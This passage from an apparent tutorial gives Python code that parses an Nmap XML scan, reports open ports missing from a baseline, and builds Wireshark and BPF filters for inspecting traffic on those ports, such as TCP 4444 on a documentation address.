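      <port protocol="tcp" portid="8080"><state state="filtered"/><service name="http-proxy"/></port>
    </ports>
  </host>
</nmaprun>"""

# Constructed baseline: what this host is supposed to expose.
BASELINE: Dict[str, Set[Port]] = {"192.0.2.10": {("tcp", 22), ("tcp", 443)}}


def open_ports(xml_text: str) -> Dict[str, Set[Port]]:
    """Map each IPv4 host in an Nmap XML report to its set of open (protocol, port) pairs."""
    root = ET.fromstring(xml_text)
    result: Dict[str, Set[Port]] = {}
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        ports: Set[Port] = set()
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                ports.add((port.get("protocol"), int(port.get("portid"))))
        result[addr_el.get("addr")] = ports
    return result


def unexpected_ports(scan: Dict[str, Set[Port]],
                     baseline: Dict[str, Set[Port]]) -> Dict[str, Set[Port]]:
    """Open ports that the baseline does not list; hosts with nothing new are omitted."""
    diff = {host: ports - baseline.get(host, set()) for host, ports in scan.items()}
    return {host: ports for host, ports in diff.items() if ports}


def wireshark_filter(host: str, ports: Set[Port]) -> str:
    """Display filter selecting traffic to or from the host on the given ports."""
    clauses = [f"{proto}.port == {num}" for proto, num in sorted(ports)]
    return f"ip.addr == {host} && ({' || '.join(clauses)})"


if __name__ == "__main__":
    for host, ports in unexpected_ports(open_ports(SAMPLE_NMAP_XML), BASELINE).items():
        print(f"{host}: new open ports {sorted(ports)}")
        print("  capture filter for Wireshark/tshark:", wireshark_filter(host, ports))
```

The filter syntax is Wireshark's display-filter language; if you want to restrict the capture itself rather than the view, the equivalent BPF capture filter is `host 192.0.2.10 and tcp port 4444`.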
